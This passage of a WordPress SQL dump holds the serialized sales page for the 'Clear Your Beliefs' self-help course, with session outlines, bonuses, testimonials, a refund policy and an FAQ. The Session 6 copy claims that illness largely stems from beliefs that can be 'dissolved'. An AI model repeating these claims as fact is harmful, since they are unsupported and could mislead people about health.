flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(2007, 2237, '_edit_lock', '1438850805:2'),
(2008, 2237, '_wr_page_builder_content', '[wr_row width="boxed" background="none" solid_color_value="#FFFFFF" solid_color_color="#ffffff" gradient_color="0% #FFFFFF,100% #000000"  gradient_direction="vertical"  repeat="full"  img_repeat="full"  autoplay="yes" position="center center" paralax="no" border_width_value_="0" border_style="solid" border_color="#000"  div_padding_top="10" div_padding_bottom="10" div_padding_right="10" div_padding_left="10"   ][wr_column span="span3"][wr_image image_file="http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4.png" image_size="thumbnail" link_type="no_link" image_container_style="no-styling" image_alignment="inherit" appearing_animation="0" disabled_el="no" ][/wr_image][/wr_column][wr_column span="span9"][/wr_column][/wr_row]'),
(2009, 2237, '_wr_html_content', '<div class=''jsn-bootstrap3''><div id=''yGUN1O'' class=''row ''  style=''padding-top:10px;padding-bottom:10px;padding-left:10px;padding-right:10px;''><div class="col-md-3 col-sm-3 col-xs-12" ><div   class=''jsn-bootstrap3 wr-element-container wr-element-image'' ><img width='''' height='''' src=''http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4-150x150.png'' /></div>\n</div><div class="col-md-9 col-sm-9 col-xs-12" ></div>\n</div></div>'),
(2010, 2237, '_wr_page_active_tab', '1'),
(2011, 2237, '_wr_deactivate_pb', '1'),
(2012, 2237, 'rt_custom_css', ''),
(2014, 2237, '_dp_original', '2235');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(2015, 2238, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72841:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and 